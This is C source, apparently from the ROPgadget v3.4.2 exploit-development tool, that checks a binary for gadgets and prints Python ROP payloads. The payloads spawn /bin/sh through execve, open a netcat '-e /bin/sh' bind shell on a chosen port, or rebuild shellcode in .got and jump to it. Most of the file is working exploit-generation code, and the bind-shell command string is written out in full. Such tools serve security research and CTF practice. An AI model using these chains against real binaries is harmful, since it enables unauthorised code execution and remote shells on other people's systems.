/*
 * Check whether the second execve("/bin/sh") combo can be built from the
 * gadgets of the binary, list every required instruction with the address
 * it was found at (a red placeholder when missing) and, when the whole set
 * is available, hand the collected gadgets to makecode() to print the
 * Python payload.
 *
 * Reads the global table tab_combo_ropsh2 (terminated by a NULL
 * .instruction) and the global Addr_sData (the .data address used as
 * scratch space by the payload).  An address of 0 from search_instruction()
 * means "not found".
 *
 * NOTE(review): the messages say "Combo 1" although this is ropmaker2 --
 * the wording is kept as is; confirm whether it is intended.
 */
void combo_ropmaker2(void)
{
  t_makecode *list_ins = NULL;
  int missing = 0;
  int i;

  /* first pass: is every instruction of the combo present? */
  for (i = 0; tab_combo_ropsh2[i].instruction != NULL; i++)
    {
      if (search_instruction(tab_combo_ropsh2[i].instruction) == 0)
        {
          missing = 1;
          break;
        }
    }

  if (missing)
    fprintf(stderr, "[%s-%s] Combo 1 was not found, missing instruction(s).\n", RED, ENDC);
  else
    fprintf(stdout, "[%s+%s] Combo 1 was found - Possible with the following gadgets. (execve)\n", GREEN, ENDC);

  /* second pass: print each instruction; collect the gadgets only when the combo is complete */
  for (i = 0; tab_combo_ropsh2[i].instruction != NULL; i++)
    {
      Elf32_Addr addr = search_instruction(tab_combo_ropsh2[i].instruction);

      if (addr == 0)
        {
          fprintf(stdout, "\t- %s..........%s => %s%s%s\n", RED, ENDC, RED, tab_combo_ropsh2[i].instruction, ENDC);
          continue;
        }
      fprintf(stdout, "\t- %s0x%.8x%s => %s%s%s\n", GREEN, addr, ENDC, GREEN, get_gadget_since_addr(addr), ENDC);
      if (!missing)
        list_ins = add_element(list_ins, get_gadget_since_addr_att(addr), addr);
    }
  fprintf(stdout, "\t- %s0x%.8x%s => %s.data Addr%s\n", GREEN, Addr_sData, ENDC, GREEN, ENDC);

  /* build the python code */
  if (!missing)
    makecode(list_ins);
}
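/*
 * Gadgets of the "write one dword to .data" primitive shared by
 * makepartie1_local() and makepartie1_remote():
 *
 *   pop <addr_reg>   ; .data + off             (reg_stack, addr_pop_stack)
 *   pop <val_reg>    ; 4 bytes of the string   (reg_binsh, addr_pop_binsh)
 *   mov <val_reg>,(<addr_reg>)                 (addr_mov)
 *
 * and, to store a zero dword without putting NUL bytes in the payload,
 *   xor <val_reg>,...                          (addr_xor)
 * in place of the second pop.
 *
 * The *_txt strings are the gadget text printed in the payload comments and
 * fed to how_many_pop*() to size the padding; the reg_* strings are the
 * "pop %reg" patterns derived from the operands of the mov gadget.
 */
typedef struct s_write_gadgets
{
  Elf32_Addr addr_mov;
  Elf32_Addr addr_xor;
  Elf32_Addr addr_pop_stack;
  Elf32_Addr addr_pop_binsh;
  char *mov_txt;        /* AT&T text (get_gadget_since_addr_att)  */
  char *xor_txt;        /* Intel text (get_gadget_since_addr)     */
  char *pop_stack_txt;  /* AT&T text                              */
  char *pop_binsh_txt;  /* AT&T text                              */
  char reg_stack[32];   /* "pop %<addr_reg>"                      */
  char reg_binsh[32];   /* "pop %<val_reg>"                       */
} t_write_gadgets;

/*
 * Fill *g from the gadgets collected in list_ins.
 *
 * Returns 0 on success, -1 when the mov gadget, one of the register-specific
 * pops or the xor could not be resolved.  ret_addr_makecodefunc() is assumed
 * to return 0 when nothing matches -- the "0 means not found" convention
 * search_instruction() follows in combo_ropmaker2 -- so an unresolved gadget
 * is reported instead of being packed as address 0 into the payload.
 */
static int resolve_write_gadgets(t_makecode *list_ins, t_write_gadgets *g)
{
  char *first_reg;
  char *second_reg;
  char instr_xor[32];

  memset(g, 0, sizeof *g);
  g->addr_mov = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
  if (g->addr_mov == 0)
    return -1;
  g->mov_txt = get_gadget_since_addr_att(g->addr_mov);
  if (g->mov_txt == NULL)
    return -1;

  /* AT&T operand order: "mov %val,(%addr)" -> first = value, second = address */
  first_reg = get_first_reg(g->mov_txt);
  second_reg = get_second_reg(g->mov_txt);
  if (first_reg == NULL || second_reg == NULL)
    {
      free(first_reg);
      free(second_reg);
      return -1;
    }
  /* only the 3-letter register name is kept (e.g. "eax") */
  snprintf(g->reg_stack, sizeof g->reg_stack, "pop %%%.3s", second_reg);
  snprintf(g->reg_binsh, sizeof g->reg_binsh, "pop %%%.3s", first_reg);
  snprintf(instr_xor, sizeof instr_xor, "xor %%%.3s", first_reg);
  free(first_reg);
  free(second_reg);

  g->addr_pop_stack = ret_addr_makecodefunc(list_ins, g->reg_stack);
  g->addr_pop_binsh = ret_addr_makecodefunc(list_ins, g->reg_binsh);
  g->addr_xor = ret_addr_makecodefunc(list_ins, instr_xor);
  if (g->addr_pop_stack == 0 || g->addr_pop_binsh == 0 || g->addr_xor == 0)
    return -1;
  g->pop_stack_txt = get_gadget_since_addr_att(g->addr_pop_stack);
  g->pop_binsh_txt = get_gadget_since_addr_att(g->addr_pop_binsh);
  g->xor_txt = get_gadget_since_addr(g->addr_xor);
  return 0;
}

/* Payload header followed by the notice printed when a write gadget is missing. */
static void print_write_gadgets_error(void)
{
  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  fprintf(stdout, "\t%s/!\\ Impossible to generate the payload: a write gadget (mov/pop/xor) was not found.%s\n", RED, ENDC);
}

/* One "p += pack(...)" line holding the address of .data + off (comment "@ .data" for off 0). */
static void emit_data_ref(Elf32_Addr off)
{
  if (off == 0)
    fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC);
  else
    fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + %u%s\n", BLUE, Addr_sData + off, (unsigned)off, ENDC);
}

/* pop <addr_reg> ; .data + off  -- selects the destination of the next store. */
static void emit_set_dest(t_write_gadgets *g, Elf32_Addr off)
{
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_pop_stack, g->pop_stack_txt, ENDC);
  display_padding(how_many_pop_before(g->pop_stack_txt, g->reg_stack));
  emit_data_ref(off);
  display_padding(how_many_pop_after(g->pop_stack_txt, g->reg_stack));
}

/* mov <val_reg>,(<addr_reg>)  -- performs the store. */
static void emit_store(t_write_gadgets *g)
{
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_mov, g->mov_txt, ENDC);
  display_padding(how_many_pop(g->mov_txt));
}

/* pop <val_reg> gadget line plus the padding that precedes its popped value. */
static void emit_pop_value(t_write_gadgets *g)
{
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_pop_binsh, g->pop_binsh_txt, ENDC);
  display_padding(how_many_pop_before(g->pop_binsh_txt, g->reg_binsh));
}

/*
 * Write the 4 bytes of `word` at .data + off.  `word` goes verbatim into the
 * payload as a Python string, so it must be exactly 4 characters: any other
 * length shifts everything that follows it in the chain.
 */
static void emit_write_word(t_write_gadgets *g, Elf32_Addr off, const char *word)
{
  emit_set_dest(g, off);
  emit_pop_value(g);
  fprintf(stdout, "\t\t%sp += \"%s\"%s\n", BLUE, word, ENDC);
  display_padding(how_many_pop_after(g->pop_binsh_txt, g->reg_binsh));
  emit_store(g);
}

/* Write the address of .data + target at .data + off (used to build argv[]). */
static void emit_write_ptr(t_write_gadgets *g, Elf32_Addr off, Elf32_Addr target)
{
  emit_set_dest(g, off);
  emit_pop_value(g);
  emit_data_ref(target);
  display_padding(how_many_pop_after(g->pop_binsh_txt, g->reg_binsh));
  emit_store(g);
}

/* Write a zero dword at .data + off through the xor gadget (no NUL in the payload). */
static void emit_write_zero(t_write_gadgets *g, Elf32_Addr off)
{
  emit_set_dest(g, off);
  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, g->addr_xor, g->xor_txt, ENDC);
  display_padding(how_many_pop(g->xor_txt));
  emit_store(g);
}

/*
 * partie 1 | write "/bin//sh\0" in .data for execve("/bin/sh", NULL, NULL).
 *
 * Layout written:   .data + 0 = "/bin"   .data + 4 = "//sh"   .data + 8 = 0
 *
 * list_ins: gadgets collected by combo_ropmaker2().  Prints the payload
 * header and the chain on stdout, or a failure notice when a gadget of the
 * write primitive cannot be resolved.
 */
static void makepartie1_local(t_makecode *list_ins)
{
  t_write_gadgets g;

  if (resolve_write_gadgets(list_ins, &g) < 0)
    {
      print_write_gadgets_error();
      return;
    }
  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  fprintf(stdout, "\t\t%s# execve /bin/sh generated by RopGadget v3.4.2%s\n", BLUE, ENDC);
  emit_write_word(&g, 0, "/bin");
  emit_write_word(&g, 4, "//sh");
  emit_write_zero(&g, 8);
}

/*
 * partie 1 bis | write "//usr/bin/netcat -ltp<port> -e///bin//sh" in .data
 * together with its argv[] for a bind shell.
 *
 * Layout written (port "6666" in this example):
 *   data + 0  = "//usr/bin/netcat"
 *   data + 17 = "-ltp6666"
 *   data + 26 = "-e///bin//sh"
 *                            ^-- data + 38 is the last NUL of the strings
 *   data + 40 = data + 0
 *   data + 44 = data + 17
 *   data + 48 = data + 26
 *   data + 52 = NULL
 *
 * Every store is one dword, so bind_mode.port must be exactly 4 characters:
 * a shorter or longer port string would shift the rest of the chain.  It is
 * checked here because nothing in this file shows where bind_mode.port is
 * validated -- TODO confirm the parser already enforces it.
 *
 * NOTE(review): the command relies on the target's netcat honouring -e,
 * which not every netcat build does.
 */
static void makepartie1_remote(t_makecode *list_ins)
{
  t_write_gadgets g;

  if (resolve_write_gadgets(list_ins, &g) < 0)
    {
      print_write_gadgets_error();
      return;
    }
  if (bind_mode.port == NULL || strlen(bind_mode.port) != 4)
    {
      fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
      fprintf(stdout, "\t%s/!\\ Impossible to generate the payload: the bind port must be exactly 4 characters (e.g. 6666).%s\n", RED, ENDC);
      return;
    }
  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  fprintf(stdout, "\t\t%s# execve /bin/sh bindport %s generated by RopGadget v3.4.2%s\n", BLUE, bind_mode.port, ENDC);

  /* argv[0] = "//usr/bin/netcat" */
  emit_write_word(&g, 0, "//us");
  emit_write_word(&g, 4, "r/bi");
  emit_write_word(&g, 8, "n/ne");
  emit_write_word(&g, 12, "tcat");
  emit_write_zero(&g, 16);
  /* argv[1] = "-ltp<port>" */
  emit_write_word(&g, 17, "-ltp");
  emit_write_word(&g, 21, bind_mode.port);
  emit_write_zero(&g, 25);
  /* argv[2] = "-e///bin//sh" */
  emit_write_word(&g, 26, "-e//");
  emit_write_word(&g, 30, "/bin");
  emit_write_word(&g, 34, "//sh");
  emit_write_zero(&g, 38);

  /* now arg_tab[]: the three pointers, then NULL */
  emit_write_ptr(&g, 40, 0);
  emit_write_ptr(&g, 44, 17);
  emit_write_ptr(&g, 48, 26);
  /* each xor/mov pair already stores a whole dword; the stores at 53..55 only
   * re-zero bytes that the store at 52 covered */
  emit_write_zero(&g, 52);
  emit_write_zero(&g, 53);
  emit_write_zero(&g, 54);
  emit_write_zero(&g, 55);
}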
/*
 * partie 1 | import shellcode in ROP instruction
 *
 * Rebuilds a shellcode inside .got one byte per iteration, from bytes that
 * were located in the binary (importsc_mode.poctet: a doubly linked list
 * with one node per shellcode byte, ->addr being where that byte lives in
 * the target, ->octet its value), then appends a return into .got.
 *
 * Gadgets looked up in list_ins:
 *   gad1  pop_reg                e.g. "pop %edx"
 *   gad2  mov (%e?x),%e?x        load the dword at ->addr
 *   gad3  mov %e?x,%e?x          only emitted when useless < 0
 *   gad4  mov %e?x,(%e?x)        store it at .got + i
 *
 * Parameters:
 *   list_ins  gadget list collected by the combo checker
 *   useless   only its sign is read: negative inserts gad3 between the
 *             load and the store (caller-chosen name, kept for compatibility)
 *   pop_reg   "pop %reg" pattern for gad1, also used to size its padding
 *
 * Caveats (reviewer notes, not established by this file):
 *   - gad4 stores a full dword at .got + i, so every byte after the first is
 *     written up to four times and the three bytes past the last one are
 *     clobbered -- presumably harmless, confirm nothing live sits there.
 *   - running code out of .got needs .got writable and executable on the
 *     target (RELRO / NX would defeat this) -- TODO confirm.
 *   - the tail search starts from wherever importsc_mode.poctet currently
 *     points and the loop leaves it moved; a NULL poctet would crash here.
 */
static void makepartie1_importsc(t_makecode *list_ins, int useless, char *pop_reg)
{
  Elf32_Addr addr_gad1 = ret_addr_makecodefunc(list_ins, pop_reg);
  char *gad1 = get_gadget_since_addr(addr_gad1);
  Elf32_Addr addr_gad2 = ret_addr_makecodefunc(list_ins, "mov (%e?x),%e?x");
  char *gad2 = get_gadget_since_addr(addr_gad2);
  Elf32_Addr addr_gad3 = ret_addr_makecodefunc(list_ins, "mov %e?x,%e?x");
  char *gad3 = get_gadget_since_addr(addr_gad3);
  Elf32_Addr addr_gad4 = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)");
  char *gad4 = get_gadget_since_addr(addr_gad4);
  int opcodes_found;
  int i;

  /* every byte of the shellcode has to exist somewhere in .text */
  opcodes_found = (checkOpcodeWasFound() != FALSE);
  fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC);
  if (!opcodes_found)
    {
      fprintf(stdout, "\t%s/!\\ Impossible to generate your shellcode because some opcode was not found.%s\n", RED, ENDC);
      return ;
    }
  fprintf(stdout, "\t\t%s# Shellcode imported! Generated by RopGadget v3.4.2%s\n", BLUE, ENDC);

  /* go to the tail: the list is consumed from its last node back to its first */
  while (importsc_mode.poctet->next != NULL)
    importsc_mode.poctet = importsc_mode.poctet->next;

  for (i = 0; i != importsc_mode.size && importsc_mode.poctet != NULL; i++)
    {
      /* pop <reg> <- address of the byte in the binary */
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC);
      display_padding(how_many_pop_before(gad1, pop_reg));
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ 0x%.2x%s\n", BLUE, importsc_mode.poctet->addr, importsc_mode.poctet->octet, ENDC);
      display_padding(how_many_pop_after(gad1, pop_reg));

      /* load the dword that starts with that byte */
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad2, gad2, ENDC);
      display_padding(how_many_pop(gad2));

      /* optional register shuffle between the load and the store */
      if (useless < 0)
        {
          fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad3, gad3, ENDC);
          display_padding(how_many_pop(gad3));
        }

      /* pop <reg> <- .got + i, then store */
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad1, gad1, ENDC);
      display_padding(how_many_pop_before(gad1, pop_reg));
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .got + %d%s\n", BLUE, Addr_sGot + i, i, ENDC);
      display_padding(how_many_pop_after(gad1, pop_reg));
      fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_gad4, gad4, ENDC);
      display_padding(how_many_pop(gad4));

      importsc_mode.poctet = importsc_mode.poctet->back;
    }

  fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # jump to our shellcode in .got%s\n", BLUE, Addr_sGot , ENDC);
}